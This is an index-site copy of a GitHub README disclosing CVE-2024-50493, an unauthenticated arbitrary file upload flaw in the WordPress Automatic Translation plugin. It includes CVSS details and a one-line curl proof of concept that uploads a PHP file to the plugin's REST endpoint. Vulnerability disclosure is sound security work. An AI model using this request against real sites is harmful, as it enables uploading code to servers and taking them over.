Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/randomrobbiebf/cve-2024-50493

Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload
https://github.com/randomrobbiebf/cve-2024-50493

Last synced: about 1 month ago
JSON representation

Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload

Awesome Lists containing this project

README

        

# CVE-2024-50493
Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload

# Description:
The Automatic Translation plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

```
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation
```

POC
---

```
curl -X POST \
-F "file_name=info.php" \
-F "file_url=@/tmp/info.php" \
"http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"
```